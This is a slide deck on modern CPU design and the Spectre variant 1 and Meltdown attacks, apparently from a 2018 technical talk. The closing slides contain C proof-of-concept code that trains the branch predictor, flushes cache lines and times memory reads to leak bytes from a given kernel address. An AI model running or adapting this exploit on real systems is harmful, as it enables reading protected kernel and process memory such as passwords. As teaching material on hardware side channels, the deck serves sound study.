SlideShare una empresa de Scribd logo
1 de 75
Descargar para leer sin conexión
Andriy Berestovskyy
2018
The Spectre of Meltdowns
( ц ) А н д р
і й Б е р е с
т о в с ь к и
й
networking hourTCP
UDP
NAT
IPsec
IPv4
IPv6
internet
protocolsAH
ESP
authentication
authorization
accounting
encapsulation
security
BGP
OSPF
ICMP
ACLSNAT
tunnelPPPoE
GRE
ARP
discovery
NDP
OSI
broadcast
multicast
IGMP
PIM
MAC
DHCP
DNS
fragmentation
semihalf
berestovskyy
The Spectre of Meltdowns
● Evolution of CPUs
● Spectre1
Attack
● Security Holy Grail
● Meltdown3
Attack
● Fixes
● Spectre-Based Meltdown PoC
2
CPU?
Central Processing Unit (CPU) — electronic
circuitry that performs basic arithmetic,
logical, control and input/output operations
specified by the instructions.
— Wikipedia
3
Basic means
simple, right?
Modern CPU Die
4Source: Kaby Lake, https://newsroom.intel.com/press-kits/8th-gen-intel-core/
Why it’s so
complicated?
About 2 billion
transistors
How does it
work?
CPU Basic Operation Cycle*
5
Hardware
implementation?
Start
Fetch Instruction at PC
Decode Instruction
Load Data From Memory
Execute Instruction
Write Data to Memory
Update Registers and PC
* Instruction Cycle
ALU
Simple CPU Implementation*
6
Instruction
Fetch/Decode
Memory
PC
Registers
Performance?
WriteExecuteDecode/LoadInstruction Fetch
* Simplified, just for an example
Instructions Per Second (IPS) — measure of a
computer's processor speed.
— Wikipedia
7
MIPS?
FLOPS?
4MHz CPU Performance
8
Cycle 1
Fetch Decode Execute Write
2 3 4 5 6 7 8
Fetch Decode Execute Write
mov ...
xor ...
cmp ...
9
Fetch
4M cycles per second / 4 cycles per instruction = 1 MIPS
Solutions?
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
De
...one cycle per
instruction?
More
performance!
Instruction pipelining — process different parts of
instructions in parallel, i.e. an attempt to keep
every part of the CPU busy.
— Wikipedia
9
Let’s do it!
CPU with Pipeline
10
InstructionFetch/Decode
Memory
PC
InstructionDecode/Execute
Registers
InstructionExecute/Write
ALU
Performance?
Pipeline Stages
WriteExecuteDecode/LoadInstruction Fetch
* Intel i486 and newer
Performance: Instruction Pipelining
11
Cycle 1
Fetch Decode Execute
2 3 5 6 7 8
Fetch Decode Write
mov ...
xor ...
cmp ...
9
Fetch
Basic Pipeline
Execute Write
div ... Decode Execute Write
Write
4
Execute
Decode
Fetch
How many MIPS for
4MHz CPU now?
4MHz CPU with Pipeline
12
Cycle 1
Fetch Decode Execute Write
2 3 4 5 6 7 8
Fetch Decode Execute Write
mov ...
xor ...
cmp ...
9
Fetch
4M cycles per second / 1 cycle per instruction = 4 MIPS
Decode Execute Write
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
More
performance!
...more MHz?
8MHz CPU with Pipeline
13
Cycle 1
F D E W
2 3 4 5 6 7 8
mov ...
xor ...
cmp ...
9
8M cycles per second / 1 cycle per instruction = 8 MIPS
More
performance?
F D E W
F D E W
10 11 12 13 14 15 16 17
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
40MHz CPU Performance
14
Cycle
mov ...
xor ...
cmp ...
40M cycles per second / 1 cycle per instruction = 40 MIPS?
Really?
mov len(%rip), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
Clock Speed Does Not Scale
15
Cycle
mov ...
xor ...
cmp ...
40M cycles per second / 1 cycle per instruction = 40 MIPS
Source: https://en.wikipedia.org/wiki/Megahertz_myth
Why?
Memory Trends
16Source: https://en.wikipedia.org/wiki/CAS_latency (First Word)
DRAM latency is
the same since
mid `90s
Solutions?
More
performance!
...but DRAM is
slow...
Cache — faster memory, closer to a CPU, which
stores copies of frequently used main memory
locations.
— Wikipedia
17
Let’s do it!
CPU with Pipeline and Cache
18
InstructionFetch/Decode
Memory
PC
InstructionDecode/Execute
Registers
InstructionExecute/Write
ALU
Performance?
Data
Cache
Instr.
Cache
Write
Buffer
* Intel i486 and newer
WriteExecuteDecode/LoadInstruction Fetch
What’s
changed?
divdiv ...
xor ... stall
CPU with Pipeline and Cache
19
Cycle
mov ...
xor ...
cmp ...
40M cycles per second / ~4 cycles per instruction = ~10 MIPS
stall
Stalls :(Stalls :(
Solution?
...but pipeline
sometimes stalls...
More
performance!
cache miss
Superscalar CPU — executes more than one
instruction during a clock cycle using
different execution units.
— Wikipedia
20
Let’s do it!
Superscalar CPU Instruction Cycle
21
Performance?
Start
Fetch Two Instructions
Decode Two Instruction
Load Order: D1, D2
Execute Two Instructions
Write Order: D1, D2
Update Order: D1, D2
* Intel Pentium and newer
Why order?
stalldiv ...
xor ... write ordering
Superscalar CPU with Cache
22
Cycle
mov ...
xor ...
cmp ...
40M CPS / ~4 CPI * 1,5 instructions per cycle = ~15 MIPS
Solutions?
cache miss
read ordering Ordering :(
...but stall due
to ordering...
More
performance!
div
Out-of-Order (dynamic) Execution — processor
executes instructions in order of input data and
execution units availability, not by their original
order in a program.
— Wikipedia
23
Let’s do it!
divdiv ...
xor ...
Out of Order CPU
24
Cycle
mov ...
xor ...
cmp ...
What about
conditional jumps?
cache miss
Read
reordering :(
* Intel Pentium Pro and newer
Write
reordering :(
Re-order buffers
on Intel CPUs
improves average instructions per cycle ratio
Why?
Conditional Jumps
uint8_t array[ 256];
size_t array_size = 256;
uint8_t bounds_check(size_t idx)
{
if (idx < array_size)
return array[idx];
return 0;
}
25
bounds_check:
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
mov array(%rdi), %eax
.L1:
ret
Performance?
Full source: https://godbolt.org/g/Snb13E
dependencyjbe ...
mov or
ret?
OoO CPU vs Conditional Jumps
26
Cycle
cmp ... cache miss
Solutions?
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
mov array(%rdi), %eax
.L1:
ret
xor ...
stall?
...but next instruction is
unknown...
More
performance!
PC
PC
Speculative Execution —perform some tasks
that may not be needed.
— Wikipedia
27
Let’s do it!
dependencyjbe ...
CPU with Speculative Execution
28
Cycle
cmp ... cache miss
What if speculation is
incorrect?
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
mov array%rdi), %eax
.L1:
ret
xor ...
speculation
cache missmov*
ret* speculation
PC
PC
Continue with
mov!
branch miss penalty
dependencyjbe ...
Branch Miss
29
Cycle
cmp ... cache miss
xor ...
speculation
cache missmov*
ret*
icache missret
Options?
speculation
Flush the
pipeline!
...but branch misses are
very expensive...
More
performance!
PC
miss
Speculation Options
30
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
ret
...
mov array(%rd), %eax
ret
...
Options:
1. Execute left branch
2. Execute right branch
3. Execute both branches
4. Other?
Pros/cons?
Solution?
Branch Predictor — digital circuit that tries to
guess which way a branch will go
before this is known definitively.
— Wikipedia
31
How does it
work?
jbe ...
Branch Predictor
32
cmp ...
xor ...
mov ...
ret ...
...
Y Y Y Y
Branch History Table
N
N N N N
Y Y Y Y
Y Y Y Y
Y N Y
N N N N
N N N N
last n-bits of instruction address
2n
elements
Y Y Y Y
prediction
...
...
Source: https://en.wikipedia.org/wiki/Branch_predictor
Let’s do it!
dependencyjbe ...
CPU with Branch Predictor
33
Cycle
cmp ... cache miss
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
mov array(%rdi), %eax
.L1:
ret
xor ...
mov*
ret*
Solutions?
speculationspeculation
cache miss
...but there are no
more ideas...
More
performance!
PC
PC
Prediction: do not take branch
Multi-Core Processor — CPU with two or more
independent processing units called cores, which
read and execute program instructions.
— Wikipedia
34
How many
cores?
CPU Trends
35Source: https://en.wikipedia.org/wiki/List_of_Intel_CPU_microarchitectures and https://en.wikipedia.org/wiki/Transistor_count
CPU clock
limit?
Summary?
72 cores * 4
= 288 threads
CPU Performance Summary
+ Instruction Pipelines
+ Memory Cache
+ Superscalar Execution
+ Out of Order Execution
+ Speculative Execution
+ Branch Prediction
+ Multiple Cores
± CPU Clock (to a certain extent)
36
Modern CPU
Core?
Modern CPU Core
37Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
Instruction Decode Queue (micro-op queue)
Allocate/Rename/Retire/Move Elimination/Zero Idiom
Scheduler
ALU
Vec ALU
Vec Shft
Vec Add
Vec Mul
FMA
DIV
Branch2
ALU
Fast LEA
Vec ALU
Vec Shft
Vec Add
Vec Mul
FMA
Slow Int
Slow LEA
ALU
Fast LEA
Vec ALU
Vec Shuff
LD/STA
LD/STA
STD
STA
32K L1
Data
Cache
256K L2
Cache
32K L1
Instruct.
Cache
MSROM
Decoded
Icache
Legacy Decode Pipeline
Branch Prediction Unit
ALU
SHFT
Branch1
Port 0 Port 1 Port 5 Port 6
P. 2
P. 3
P. 4
P. 7
Modern CPU
Die?
L3
Modern CPU Die
38
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
L3Cache
L3Cache
System
Agent
Memory Controller
InterconnectGPU
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
L3Cache
L3Cache
CPU
Core
CPU
Core
CPU
Core
CPU
Core
CPU
Core
CPU
Core
Source: https://newsroom.intel.com/press-kits/8th-gen-intel-core/
So, why it’s so
complicated?
About 2 billion
transistors
Because we need performance!
39
So, what about
Spectre et al?
All Your Secrets Belong to Us ()
uint8_t array[ 256 * 4096];
size_t array_size = 256;
uint8_t bounds_check(size_t idx)
{
if (idx < array_size)
return array[idx * 4096];
return 0;
}
40
bounds_check:
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
sal $12, %rdi
mov array(%rdi), %eax
.L1:
ret
Execution?
Full source: https://godbolt.org/g/Snb13E
Why?
dependencyjbe ...
Bounds Check on Modern CPU
41
Cycle
cmp ... cache miss
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
sal $12, %rdi
mov array(%rdi), %eax
xor ...
mov*
sal* speculation
cache miss
What about
cache?
PC
PC
speculation
Prediction: do not take branch
sal* speculation
Virtual Memory
dependencyjbe ...
Memory Prior Cache Misses
42
array
cmp ... cache miss
cmp %rdi, array_size(%rip)
jbe .L1
sal $12, %rdi
mov array(%rdi), %eax
mov* speculationcache miss
What will happen
after execution?
array_size
array_size * 4096
“cold” memory cached memory
PC
PC
Current Cycle
Prediction: do not take branch
Virtual Memory
dependencyjbe ...
Memory After Cache Misses
43
array
cmp ... cache miss
cmp %rdi, array_size(%rip)
jbe .L1
sal $12, %rdi
mov array(%rdi), %eax
mov* cache miss
array_size
“cold” memory cached memory
What if we missed
the branch?
PC
PC
Current Cycle
sal* speculation
speculation
Prediction: do not take branch
array_size * 4096
cmp ... cache miss
Virtual Memory
dependencyjbe ...
Memory After Branch Miss
44
array
sal $12, %rdi
mov array(%rdi), %eax
.L1:
ret
mov* cache miss
array_size
“cold” memory cached memory
PC
sal* speculation
speculation
Side effect!
miss
retPC
Flush the
pipeline!
How to detect
cache side effect?
Observing Cache Side Effects
45
Virtual Memory arrayarray_size
“cold” memory cached memoryuint8_t array[ 256 * 4096];
size_t array_size = 256;
...
for (i = 0; i < 256; i++) {
start = rdtscp();
tmp = array[i * 4096];
cycles = rdtscp() - start;
...
}
How can we exploit
this side effects?
* Simplification
Speculation
side effect
bounds_check(unsigned long):
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
mov base_array(%rdi), %eax
sal $12, %eax
mov side_effects(%rax), %eax
.L1:
rep ret
Memory Before Indirect Read
46
Virtual Memory base_arrayarray_size
“cold” memory cached memory
size_t array_size = 16;
uint8_t side_effects[256 * 4096];
uint8_t base_array[16];
uint8_t bounds_check(uint64_t idx)
{
if (idx < array_size) {
uint8_t byte = base_array[idx];
return side_effects[byte * 4096];
}
return 0;
}
After?
side_effects
byte = base_array[idx]
side_effects[byte * 4096]
precached data
array_size
Full source: https://github.com/berestovskyy/spectre-meltdown
Cache
miss!
Cache
miss!
Why?
bounds_check(unsigned long):
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
mov base_array(%rdi), %eax
sal $12, %eax
mov side_effects(%rax), %eax
.L1:
rep ret
Memory After Indirect Read
47
Virtual Memory base_arrayarray_size
“cold” memory cached memory
size_t array_size = 16;
uint8_t side_effects[256 * 4096];
uint8_t base_array[16];
uint8_t bounds_check(uint64_t idx)
{
if (idx < array_size) {
uint8_t byte = base_array[idx];
return side_effects[byte * 4096];
}
return 0;
}
Pipeline?
side_effects
byte = base_array[idx]
side_effects[byte * 4096]
precached data
array_size
Full source: https://github.com/berestovskyy/spectre-meltdown
dependencyjbe ...
Bounds Check Pipeline
48
Cycle
cmp ... array_size
bounds_check(unsigned long):
cmp %rdi, array_size(%rip)
jbe .L1
mov base_array(%rdi), %eax
sal $12, %eax
mov side_effects(%rax), %eax
mov*
mov*
Prediction: do not take branch
speculation
side_effects
PC
PC
sal*
Data is
precached
Speculative read
from side_effect
Can we reach
outside the array?
bounds_check(unsigned long):
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
mov base_array(%rdi), %eax
sal $12, %eax
mov side_effects(%rax), %eax
.L1:
rep ret
Bounds Check Bypass
49
Virtual Memory base_arrayarray_size
“cold” memory cached memory
secret
size_t array_size = 16;
uint8_t side_effects[256 * 4096];
uint8_t base_array[16];
uint8_t bounds_check(uint64_t idx)
{
if (idx < array_size) {
uint8_t secret = base_array[idx];
return side_effects[secret * 4096];
}
return 0;
}
Spectre?
side_effects
secret = base_array[idx], idx = secret - base_array
side_effects[secret * 4096]
precached secret
array_size
Full source: https://github.com/berestovskyy/spectre-meltdown
Putting All Together: Spectre1
1. Call few times bounds_check() with valid index
2. Flush array_size from cache to get cache miss
3. Call bounds_check with index pointing to secret
4. Use secret as an index to side_effects
5. Observe side_effects access time
50Full source: https://github.com/berestovskyy/spectre-meltdown
Summary?
Spectre1
Summary
1. Reason: cache side effects
2. The source code is valid, no (easy) fix in software
3. Cache side-channel might be fixed in the future
4. Reads any byte within current process memory
51
Is it even
dangerous?
1. eBPF
2. Java
3. JavaScript
Online checker:
https://xlab.tencent.com/special/spectre/
4. Other JIT engines
ouch!
Spectre1
Victims
52
Scenarios?
HTTP POST secrets.json5
JavaScript Attack Scenario
53
Web
Browser
Web
Server
GET /1
2 OK index.html
4
GET /spectre.js3
OK spectre.js
Parse
index.html
Execute
spectre.js
Execution?
cmp r15, [rbp - 0xe0]
jnc 0x24dd099bb870
lea rsi, [r12 + rdx * 1]
mov rsi, [rsi + r15 * 1]
shl rsi, 12
and rsi, 0x1ffffff
mov rsi, [rsi + r8 * 1]
xor rsi, rdi
mov rdi, rsi
if (index < base_array.length) {
secret = base_array[index | 0];
secret = (((secret * 4096)|0);
tmp ^= side_effects[index| 0]|0;
}
JavaScript Attack Execution
54
Browser base_array length
“cold” memory cached memory
passwords
Meltdown?
side_effects
JavaScript JIT
side_effects[secret * 4096]
browser passwordsJIT sandbox
Source: Spectre Attacks: Exploiting Speculative Execution, Paul Kocher et al
Most important security feature?
55
Process isolation — hardware and software
technologies designed to protect each process
from other processes by by disallowing
inter-process memory access.
— Wikipedia
56
Hardware?
In practice?
Virtual Memory — abstraction of the resources
that are actually available on a given machine.
Combination of hardware and software maps
Virtual Addresses into Physical Addresses.
— Wikipedia
57
How to map Virtual
to Physical?
Translation Lookaside Buffer (TLB) — stores recent
translations of virtual memory to physical memory,
i.e. address-translation cache. Part of CPU
memory-management unit (MMU).
— Wikipedia
58
Drawings!
Process Isolation
59
Process 1 arraymain()
Process 2 main()
64 bit virtual address space
Kernel syscall()
Physical Memory
data
Swap
Why?
Mapped by OS,
translated using TLB.
How to
communicate?
System Call — programmatic way to request a
service from the kernel. Syscall it is a privilege level
switch, no process context switch, i.e. syscall is
processed in user process context.
— Wikipedia
60
Why no process
context switch?
Skylake TLB Cache Hierarchy
61Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
Level Page Size Entries
Instruction
First Level Data
Instruction
First Level Data
First Level Data
Second Level
Second Level
...how to access
kernel data?
4KB
4KB
2MB/4MB
2MB/4MB
1GB
Shared 4KB and 2/4MB
1GB
128
8 per thread
64
32
4
1536
16
So, if no process
context switch...
Not that
much :(
Start Kernel Map
Kernel Mapping
62
Process 1 array1main()
Process 2 main() Kernel syscall()
Physical Memory
data
Swap
Kernel syscall() data
SYSCALL
data access
Now, how to protect
kernel data?
Bomba!
CPU Privilege Level — per-process operating mode
restrictions on type and scope of operations that
can be performed, i.e. OS to run with more
privileges than application software.
— Wikipedia
63
Start Kernel Map
Privilege Level Switch
64
Process array1main() Kernel syscall() data
kernel is able to access process data
So, what is
Meltdown?
Mega!
privilege level switch (SYSCALL)
64 bit virtual address space
process is not able to access kernel data
Meltdown — hardware vulnerability, which allows
a rogue process to read all memory, even when it is
not authorized to do so.
— Wikipedia
65
Kernel is mapped to
each process...
Start Kernel Map
Meltdown
66
Process array1main() Kernel syscall() data
kernel is able to access process data
Let’s do it!
Meltdown :(
64 bit virtual address space
process is able to read kernel data
bounds_check(unsigned long):
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
mov base_array(%rdi), %eax
sal $12, %eax
mov side_effects(%rax), %eax
.L1:
rep ret
Recap: Bounds Check Bypass
67
Virtual Memory base_arrayarray_size
“cold” memory cached memory
secret
size_t array_size = 16;
uint8_t side_effects[256 * 4096];
uint8_t base_array[16];
uint8_t bounds_check(uint64_t idx)
{
if (idx < array_size) {
uint8_t secret = base_array[idx];
return side_effects[secret * 4096];
}
return 0;
}
Can we exploit it to
access kernel data?
side_effects
secret = base_array[idx]
side_effects[secret * 4096]
precached secret
array_size
Full source: https://github.com/berestovskyy/spectre-meltdown
bounds_check(unsigned long):
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
mov base_array(%rdi), %eax
sal $12, %eax
mov side_effects(%rax), %eax
.L1:
rep ret
Spectre1
Attack to Kernel Data
68
Virtual Memory base_arrayarray_size
“cold” memory cached memory
kernel
size_t array_size = 16;
uint8_t side_effects[256 * 4096];
uint8_t base_array[16];
uint8_t bounds_check(uint64_t idx)
{
if (idx < array_size) {
uint8_t secret = base_array[idx];
return side_effects[secret * 4096];
}
return 0;
}
side_effects
secret = base_array[idx]
side_effects[secret * 4096]
precached kernel
array_size
Full source: https://github.com/berestovskyy/spectre-meltdown
How?
Putting All Together: Meltdown3
1. Find address of a kernel structure (out of scope)
2. Invoke a system call to cache this structure
3. Do Spectre1
, but with kernel address:
a. Call few times bounds_check() with valid index
b. Flush array_size from cache to get a cache miss
c. Call bounds_check with index pointing to kernel structure
d. Use secret as an index to side_effects
e. Observe side_effects access time
69Full source: https://github.com/berestovskyy/spectre-meltdown
Summary?
Meltdown3
Summary
1. Reason 0: hardware bug — accessing memory
and checking privileges in parallel
2. Reason 1: cache side effects (i.e. Spectre)
3. Reason 2: kernel mapped into every process
to privilege, not process context switch
4. Reads any mapped and cached byte
70
Is it even
dangerous?
HTTP POST kernel-data.json5
Meltdown Attack Scenario
71
Web
Browser
Web
Server
GET /1
2 OK index.html
4
GET /meltdown.js3
OK meltdown.js
Parse
index.html
Execute
meltdown.js with
valid syscalls
How to fix?
Fixes: An Open Question
Spectre1
:
1. Speculation barrier
2. Other?
72
Meltdown3
:
1. Process ctx instead of
privilege lvl switch
2. PCID/ASID
3. Other?
Spectre-Based Meltdown PoC
#define MIN_READS 100
#define MAX_READ_CYCLES 1000
#define BRANCH_TRAINS 6
#define BYTE_VALUES 256
#define PAGE_SIZE 4096
size_t array_size = BRANCH_TRAINS;
uint8_t side_effects[BYTE_VALUES * PAGE_SIZE] = {1};
uint8_t base_array[BRANCH_TRAINS];
uint8_t tmp;
char secret[] = "My password";
int fd;
uint8_t bounds_check(uint64_t idx)
{
if (idx < array_size)
return side_effects[base_array[idx] * PAGE_SIZE];
return 0;
}
73
uint8_t read_any_byte(uint64_t addr);
int main(int argc, char **argv)
{
uint8_t byte;
uint64_t addr = (uint64_t)&secret;
addr = argc < 2 ? 0xffffffff81800040ULL
: strtoull(argv[1], NULL, 0);
addr = addr != 0 ? addr : (uint64_t)&secret;
if ((fd = open("/proc/version", O_RDONLY)) < 0)
perror("Error opening /proc/version");
do {
byte = read_any_byte(addr);
printf("0x%" PRIx64 " = 0x%x ('%c')n", addr++,
byte, byte);
} while (byte != 0);
return 0;
}
Full source: https://github.com/berestovskyy/spectre-meltdown
Meltdown
uint8_t read_any_byte(uint64_t addr)
{
size_t tries, i, sum = 0, cnt = 0, mins[BYTE_VALUES];
addr -= (uint64_t)&base_array;
for (i = 0; i < BYTE_VALUES; i++)
mins[i] = SIZE_MAX;
for (tries = 0; tries < MIN_READS * 5; tries++) {
char buf[PAGE_SIZE];
if (fd > 0 && pread(fd, &buf, sizeof(buf), 0) < 0)
perror("Error reading /proc/version");
...
}
return 0;
}
for (i = 1; i <= BRANCH_TRAINS * 4; i++) {
_mm_clflush(&array_size);
sched_yield();
tmp = bounds_check(addr & (i % BRANCH_TRAINS - 1));
}
for (i = 1; i < BYTE_VALUES; i++) {
__sync_synchronize();
register uint64_t start_tsc = __rdtsc();
tmp = side_effects[i * PAGE_SIZE];
__sync_synchronize();
register uint64_t cycles = __rdtsc() - start_tsc;
_mm_clflush(&side_effects[i * PAGE_SIZE]);
if (cycles > MAX_READ_CYCLES)
break;
else if (cycles < mins[i])
mins[i] = cycles;
if (cnt > MIN_READS && mins[i] < sum / cnt * 2 / 3)
return i;
sum += cycles;
cnt++;
}
Read Any Byte()
Full source: https://github.com/berestovskyy/spectre-meltdown
Meltdown
References
1. Meltdown and Spectre
https://meltdownattack.com/
2. Spectre Attacks: Exploiting Speculative Execution bye Paul Kocher et al
https://spectreattack.com/spectre.pdf
3. Meltdown by Moritz Lipp et al
https://meltdownattack.com/meltdown.pdf
4. ARM Developer. Vulnerability of Speculative Processors to Cache Timing Side-Channel Mechanism
https://developer.arm.com/support/security-update
5. Intel Software Developer Manuals
https://software.intel.com/en-us/articles/intel-sdm
6. Spectre-based Meltdown proof of concept in just 99 lines of code:
https://github.com/berestovskyy/spectre-meltdown
75

Más contenido relacionado

La actualidad más candente

DoS and DDoS mitigations with eBPF, XDP and DPDK
DoS and DDoS mitigations with eBPF, XDP and DPDKDoS and DDoS mitigations with eBPF, XDP and DPDK
DoS and DDoS mitigations with eBPF, XDP and DPDKMarian Marinov
 
AMD: Where Gaming Begins
AMD: Where Gaming BeginsAMD: Where Gaming Begins
AMD: Where Gaming BeginsAMD
 
from Binary to Binary: How Qemu Works
from Binary to Binary: How Qemu Worksfrom Binary to Binary: How Qemu Works
from Binary to Binary: How Qemu WorksZhen Wei
 
Programmation de systèmes embarqués : BeagleBone Black et Linux embarqué
Programmation de systèmes embarqués : BeagleBone Black et Linux embarquéProgrammation de systèmes embarqués : BeagleBone Black et Linux embarqué
Programmation de systèmes embarqués : BeagleBone Black et Linux embarquéECAM Brussels Engineering School
 
[232] 성능어디까지쥐어짜봤니 송태웅
[232] 성능어디까지쥐어짜봤니 송태웅[232] 성능어디까지쥐어짜봤니 송태웅
[232] 성능어디까지쥐어짜봤니 송태웅NAVER D2
 
Velocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFVelocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFBrendan Gregg
 
Q4.11: ARM Architecture
Q4.11: ARM ArchitectureQ4.11: ARM Architecture
Q4.11: ARM ArchitectureLinaro
 
Yocto project and open embedded training
Yocto project and open embedded trainingYocto project and open embedded training
Yocto project and open embedded trainingH Ming
 
The Linux Kernel Scheduler (For Beginners) - SFO17-421
The Linux Kernel Scheduler (For Beginners) - SFO17-421The Linux Kernel Scheduler (For Beginners) - SFO17-421
The Linux Kernel Scheduler (For Beginners) - SFO17-421Linaro
 
Pic 16f877 ..
Pic 16f877 ..Pic 16f877 ..
Pic 16f877 ..sunprass
 
Simd programming introduction
Simd programming introductionSimd programming introduction
Simd programming introductionChamp Yen
 
BPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLabBPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLabTaeung Song
 
Arm système embarqué
Arm système embarquéArm système embarqué
Arm système embarquéHoussem Rouini
 
Intel core i7 processors
Intel core i7 processorsIntel core i7 processors
Intel core i7 processorsSelf employed
 
CPU Architectures for Mobile Phone Devices
CPU Architectures for Mobile Phone DevicesCPU Architectures for Mobile Phone Devices
CPU Architectures for Mobile Phone Devicessagar chansaulia
 
Programmation de systèmes embarqués : Systèmes temps réel et PRUSS
Programmation de systèmes embarqués : Systèmes temps réel et PRUSSProgrammation de systèmes embarqués : Systèmes temps réel et PRUSS
Programmation de systèmes embarqués : Systèmes temps réel et PRUSSECAM Brussels Engineering School
 

La actualidad más candente (20)

Memory model
Memory modelMemory model
Memory model
 
DoS and DDoS mitigations with eBPF, XDP and DPDK
DoS and DDoS mitigations with eBPF, XDP and DPDKDoS and DDoS mitigations with eBPF, XDP and DPDK
DoS and DDoS mitigations with eBPF, XDP and DPDK
 
AMD: Where Gaming Begins
AMD: Where Gaming BeginsAMD: Where Gaming Begins
AMD: Where Gaming Begins
 
Intel Core i7
Intel Core i7Intel Core i7
Intel Core i7
 
from Binary to Binary: How Qemu Works
from Binary to Binary: How Qemu Worksfrom Binary to Binary: How Qemu Works
from Binary to Binary: How Qemu Works
 
Intel Core i7 Processors
Intel Core i7 ProcessorsIntel Core i7 Processors
Intel Core i7 Processors
 
Programmation de systèmes embarqués : BeagleBone Black et Linux embarqué
Programmation de systèmes embarqués : BeagleBone Black et Linux embarquéProgrammation de systèmes embarqués : BeagleBone Black et Linux embarqué
Programmation de systèmes embarqués : BeagleBone Black et Linux embarqué
 
[232] 성능어디까지쥐어짜봤니 송태웅
[232] 성능어디까지쥐어짜봤니 송태웅[232] 성능어디까지쥐어짜봤니 송태웅
[232] 성능어디까지쥐어짜봤니 송태웅
 
Andes RISC-V processor solutions
Andes RISC-V processor solutionsAndes RISC-V processor solutions
Andes RISC-V processor solutions
 
Velocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFVelocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPF
 
Q4.11: ARM Architecture
Q4.11: ARM ArchitectureQ4.11: ARM Architecture
Q4.11: ARM Architecture
 
Yocto project and open embedded training
Yocto project and open embedded trainingYocto project and open embedded training
Yocto project and open embedded training
 
The Linux Kernel Scheduler (For Beginners) - SFO17-421
The Linux Kernel Scheduler (For Beginners) - SFO17-421The Linux Kernel Scheduler (For Beginners) - SFO17-421
The Linux Kernel Scheduler (For Beginners) - SFO17-421
 
Pic 16f877 ..
Pic 16f877 ..Pic 16f877 ..
Pic 16f877 ..
 
Simd programming introduction
Simd programming introductionSimd programming introduction
Simd programming introduction
 
BPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLabBPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLab
 
Arm système embarqué
Arm système embarquéArm système embarqué
Arm système embarqué
 
Intel core i7 processors
Intel core i7 processorsIntel core i7 processors
Intel core i7 processors
 
CPU Architectures for Mobile Phone Devices
CPU Architectures for Mobile Phone DevicesCPU Architectures for Mobile Phone Devices
CPU Architectures for Mobile Phone Devices
 
Programmation de systèmes embarqués : Systèmes temps réel et PRUSS
Programmation de systèmes embarqués : Systèmes temps réel et PRUSSProgrammation de systèmes embarqués : Systèmes temps réel et PRUSS
Programmation de systèmes embarqués : Systèmes temps réel et PRUSS
 

Similar a The Spectre of Meltdowns

了解Cpu
了解Cpu了解Cpu
了解CpuFeng Yu
 
Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Andriy Berestovskyy
 
Where Did My CPU Go?
Where Did My CPU Go?Where Did My CPU Go?
Where Did My CPU Go?Enkitec
 
Rmoug13 - where did my CPU go?
Rmoug13 - where did my CPU go?Rmoug13 - where did my CPU go?
Rmoug13 - where did my CPU go?Enkitec
 
RMOUG 2013 - Where did my CPU go?
RMOUG 2013 - Where did my CPU go?RMOUG 2013 - Where did my CPU go?
RMOUG 2013 - Where did my CPU go?Kristofferson A
 
Super scaling singleton inserts
Super scaling singleton insertsSuper scaling singleton inserts
Super scaling singleton insertsChris Adkin
 
RedGateWebinar - Where did my CPU go?
RedGateWebinar - Where did my CPU go?RedGateWebinar - Where did my CPU go?
RedGateWebinar - Where did my CPU go?Kristofferson A
 
PerfUG 3 - perfs système
PerfUG 3 - perfs systèmePerfUG 3 - perfs système
PerfUG 3 - perfs systèmeLudovic Piot
 
General Purpose Computing using Graphics Hardware
General Purpose Computing using Graphics HardwareGeneral Purpose Computing using Graphics Hardware
General Purpose Computing using Graphics HardwareDaniel Blezek
 
Troubleshooting Linux Kernel Modules And Device Drivers
Troubleshooting Linux Kernel Modules And Device DriversTroubleshooting Linux Kernel Modules And Device Drivers
Troubleshooting Linux Kernel Modules And Device DriversSatpal Parmar
 
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1Jagadisha Maiya
 
Performance evaluation with Arm HPC tools for SVE
Performance evaluation with Arm HPC tools for SVEPerformance evaluation with Arm HPC tools for SVE
Performance evaluation with Arm HPC tools for SVELinaro
